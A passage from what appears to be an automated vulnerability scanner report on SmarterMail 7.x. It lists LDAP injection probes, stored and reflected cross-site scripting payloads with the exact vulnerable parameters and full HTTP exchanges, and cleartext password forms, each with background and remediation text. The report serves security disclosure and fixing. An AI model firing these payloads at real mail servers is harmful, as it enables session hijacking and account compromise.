The payloads 5faa0382d747b754)(sn=* and 5faa0382d747b754)!(sn=* were each submitted in the type parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /Main/frmEmptyPreviewOuter.aspx?type=5faa0382d747b754)(sn=* HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"}

Response 1

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:28:00 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 5204


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   No item has been selecte
...[SNIP]...
<![CDATA[
UpdateSidebarCounts('UserSync', 0);
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fMain\x2ffrmEmptyPreviewOuter\x2easpx?type\x3d5faa0382d747b754\x29\x28sn\x253d\x2a'); });
Sys.Application.initialize();
$(function() { SetTopTitle('No\x20item\x20has\x20been\x20selected\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail'); });
//]]>
</script>
</form>
</body>
</html>

Request 2

GET /Main/frmEmptyPreviewOuter.aspx?type=5faa0382d747b754)!(sn=* HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"}

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:28:00 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 5247


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   No item has been selecte
...[SNIP]...
<![CDATA[
UpdateSidebarCounts('UserEmail', 0);
UpdateSidebarCounts('UserSync', 0);
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fMain\x2ffrmEmptyPreviewOuter\x2easpx?type\x3d5faa0382d747b754\x29\x21\x28sn\x253d\x2a'); });
Sys.Application.initialize();
$(function() { SetTopTitle('No\x20item\x20has\x20been\x20selected\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail'); });
//]]>
</script>
</form>
</body>
</html>


3. Cross-site scripting (stored)  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmToday.aspx

Issue detail

The value of the ctl00%24MPH%24SubjectBox_SettingText request parameter submitted to the URL /Main/Calendar/frmEvent.aspx is copied into the HTML document as plain text between tags at the URL /Main/frmToday.aspx. The payload f5d23<script>alert(1)</script>eb582083b9d was submitted in the ctl00%24MPH%24SubjectBox_SettingText parameter. This input was returned unmodified in a subsequent request for the URL /Main/frmToday.aspx.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach targe users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request 1

POST /Main/Calendar/frmEvent.aspx?popup=true HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmEvent.aspx?popup=true#
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"}; ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55
Content-Length: 27088

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24BPH%24SaveTextImageButton&ctl00%24TPH%24TabStrip%24SelectedTab=ctl00_TPH_TabStrip_Tab1&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24SubjectBox_SettingText=f5d23<script>alert(1)</script>eb582083b9d&ctl00%24MPH%24InviteBox=&ctl00_MPH_InviteBox_ClientState=%7B%22logEntries%22%3A%5B%5D%2C%22value%22%3A%22%22%2C%22text%22%3A%22%22%2C%22enabled%22%3Atrue%7D&ctl00%24MPH%24LocationBox_SettingText=anyt
...[SNIP]...

Request 2

GET /Main/frmToday.aspx HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 00:29:05 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 1294009


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   My Today Page - hoytllc.
...[SNIP]...
<a href="#" onclick="OpenNewMessage('Calendar/frmEvent.aspx?edit=b0f7be7eec69411b82be79429c806520&returnTo=frmToday', 600,400);">f5d23<script>alert(1)</script>eb582083b9d</a>
...[SNIP]...

4. Cross-site scripting (reflected)  previous  next
There are 4 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx [ctl00%24Split%24LP%24SessionKey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Default.aspx

Issue detail

The value of the ctl00%24Split%24LP%24SessionKey request parameter is copied into the HTML document as plain text between tags. The payload 4add0<script>alert(1)</script>2140bd7fb8a was submitted in the ctl00%24Split%24LP%24SessionKey parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Default.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx#page=L01haW4vZnJtTWVzc2FnZXMuYXNweD91c2VyPWVuZHVzZXImZm9sZGVyPWluYm94Jm1hcHBlZD1mYWxzZSZsZWZ0bmF2PXRydWU_&section=UserEmail&lbh=false
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"}
Content-Length: 553

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24Split%24LP%24lnkUpdate&__EVENTTARGET=ctl00%24Split%24LP%24lnkUpdate&__EVENTARGUMENT=UserContacts%7C%2FMain%2FfrmMessages.aspx%3Fuser%3Denduser%2
...[SNIP]...
3Dtrue&__VIEWSTATE=%2FwEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZGQAofCuGKRyjE010WA%2FAQKKvJgVAw%3D%3D&ctl00%24Split%24LP%24SessionKey=64620560dff748d598e0b5f7f834d3424add0<script>alert(1)</script>2140bd7fb8a&ctl00%24PageTitle=Inbox%20-%20hoytllc.com%20-%20SmarterMail&ctl00%24PanelLoadedState=%7B%7D&__ASYNCPOST=true&

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:46:49 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 24201

13901|updatePanel|ctl00_Split_LP_StyledUpdatePanel1|
                   
<div style="display: none">
   <div id="ctl00_Split_LP_ctl01_btnDelete" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' on
...[SNIP]...
', dataSource, -1, 1, 0, NavPreviewPane, 0, ShowContextMenu_ctl00_Split_LP_ctl01_ctl00, DoubleClick, DoDelete, false, 2, '\x7b0\x7d\x20selected\x20items', false, true, '64620560dff748d598e0b5f7f834d3424add0<script>alert(1)</script>2140bd7fb8a', -1, '', '', false, '', [{"min":25,"max":25,"percent":false,"locked":true},{"min":100,"max":400,"percent":false,"locked":false}], '/Main/frmEmptyPreviewOuter.aspx?type=contacts', SMWeb.Services.svcSu
...[SNIP]...

4.2. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmStoredFiles.aspx [path parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmStoredFiles.aspx

Issue detail

The value of the path request parameter is copied into the HTML document as plain text between tags. The payload b4cb8<script>alert(1)</script>e5e03b9ed16c7553d was submitted in the path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /Main/frmStoredFiles.aspx?path=b4cb8<script>alert(1)</script>e5e03b9ed16c7553d&ctl00%24ScriptManager1=ctl00%24MPH%24GridUpdatePanel%7Cctl00%24MPH%24UpdateGridButton&__EVENTTARGET=ctl00%24MPH%24UpdateGridButton&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY3NjA2Njk1Nw8WBh4IX19fVGl0bGUFC1Jvb3QgRm9sZGVyHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYIAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HgdWaXNpYmxlaGQCBg8WAh8EaGQCBw9kFgJmD2QWAgIBDxYCHwRoFgICAQ8WAh4EVGV4dGVkAggPFgIfBGhkGAEFE2N0bDAwJE1QSCRGaWxlc0dyaWQPBSRUcnVlfFRydWV8fEZhbHNlfFRydWV8fEZhbHNlfEZhbHNlfDBkH73EnZAztfbwXar7gj3Qxj89sFo%3D&ctl00%24MPH%24uploadValidationToken=98dee8a7f3fc415c919a873e64836960&ctl00%24MPH%24pathField=Root%20Folder%5C&ctl00%24MPH%24userField=euser&ctl00%24MPH%24domainField=hoytllc.com&ctl00_MPH_FilesGrid_HiddenInput=&ctl00_MPH_FilesGrid_HiddenLSR=&p15dkvja301hh2v5q1i3n1vsj11690_0_name=fastdial.net-netsparker.pdf&p15dkvja301hh2v5q1i3n1vsj11690_0_status=done&__ASYNCPOST=true HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmStoredFiles.aspx?path=Root+Folder%5c
Origin: http://vulnerable.SmarterMail 7.x.host:9998
X-MicrosoftAjax: Delta=true
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SelectedLanguage=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserStorage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 00:14:16 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 11677

626|updatePanel|ctl00_BPH_ButtonUpdatePanel|
           <div id="ctl00_BPH_PublishButton" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_PublishButton(); return f
...[SNIP]...
_MPH_FilesGrid_HiddenInput=&ctl00_MPH_FilesGrid_HiddenLSR=&p15dkvja301hh2v5q1i3n1vsj11690_0_name=fastdial.net-netsparker.pdf&p15dkvja301hh2v5q1i3n1vsj11690_0_status=done&__ASYNCPOST=true|75|pageTitle||b4cb8<script>alert(1)</script>e5e03b9ed16c7553d - hoytllc.com - SmarterMail|149|scriptBlock|ScriptPath|/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&t=ffffffff8fb8
...[SNIP]...

4.3. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmStoredFiles.aspx [path parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmStoredFiles.aspx

Issue detail

The value of the path request parameter is copied into the HTML document as text between TITLE tags. The payload 99cc2</title><script>alert(1)</script>3111003d311 was submitted in the path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Main/frmStoredFiles.aspx?path=99cc2</title><script>alert(1)</script>3111003d311 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserStorage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:27:36 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 18806


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   99cc2</title><script>alert(1)</script>3111003d311 - hoytllc.com - SmarterMail
</title>
...[SNIP]...

4.4. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmStoredFiles.aspx [path parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmStoredFiles.aspx

Issue detail

The value of the path request parameter is copied into the HTML document as plain text between tags. The payload 4e2dc<script>alert(1)</script>ba99eeeec80 was submitted in the path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Main/frmStoredFiles.aspx?path=4e2dc<script>alert(1)</script>ba99eeeec80 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserStorage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:27:29 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 18699


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   4e2dc<script>alert(1)</s
...[SNIP]...
<div id="PageTitle" class="PageTitleText">
                       4e2dc<script>alert(1)</script>ba99eeeec80
                   </div>
...[SNIP]...

5. Cleartext submission of password  previous  next
There are 4 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


5.1. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Login.aspx HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: vulnerable.SmarterMail 7.x.host:9998
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:18:49 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 7968


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<body class="Login" dir="ltr">
   <form method="post" action="Login.aspx" id="aspnetForm">
<div>
...[SNIP]...
</div>
       <input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="2" style="width: 310px" />
   </div>
...[SNIP]...

5.2. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmChangePasswordWizard.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmChangePasswordWizard.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /Main/frmChangePasswordWizard.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:09 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8230
Connection: Close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<body class="Wizard" dir="ltr">
   <form method="post" action="frmChangePasswordWizard.aspx" id="aspnetForm">
<div>
...[SNIP]...
<td id="ctl00_MPH_txtOldPassword_Setting" class="Setting"><input name="ctl00$MPH$txtOldPassword_SettingText" type="password" id="ctl00_MPH_txtOldPassword_SettingText" class="text" autocomplete="off" /></td>
...[SNIP]...
<td id="ctl00_MPH_txtNewPassword_Setting" class="Setting"><input name="ctl00$MPH$txtNewPassword_SettingText" type="password" id="ctl00_MPH_txtNewPassword_SettingText" class="text" autocomplete="off" /></td>
...[SNIP]...
<td id="ctl00_MPH_txtConfNewPassword_Setting" class="Setting"><input name="ctl00$MPH$txtConfNewPassword_SettingText" type="password" id="ctl00_MPH_txtConfNewPassword_SettingText" class="text" autocomplete="off" /></td>
...[SNIP]...

5.3. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMySettings.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmMySettings.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /Main/frmMySettings.aspx HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserSettings"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:21:34 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 56951


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Account Settings - hoytl
...[SNIP]...
<body class="" dir="ltr">
   <form method="post" action="frmMySettings.aspx" id="aspnetForm">
<div>
...[SNIP]...
<td id="ctl00_MPH_wucUserSettings_txtChangePassword_CurrentPassword_Setting" class="Setting"><input name="ctl00$MPH$wucUserSettings$txtChangePassword_CurrentPassword_SettingText" type="password" id="ctl00_MPH_wucUserSettings_txtChangePassword_CurrentPassword_SettingText" class="text" autocomplete="off" /></td>
...[SNIP]...
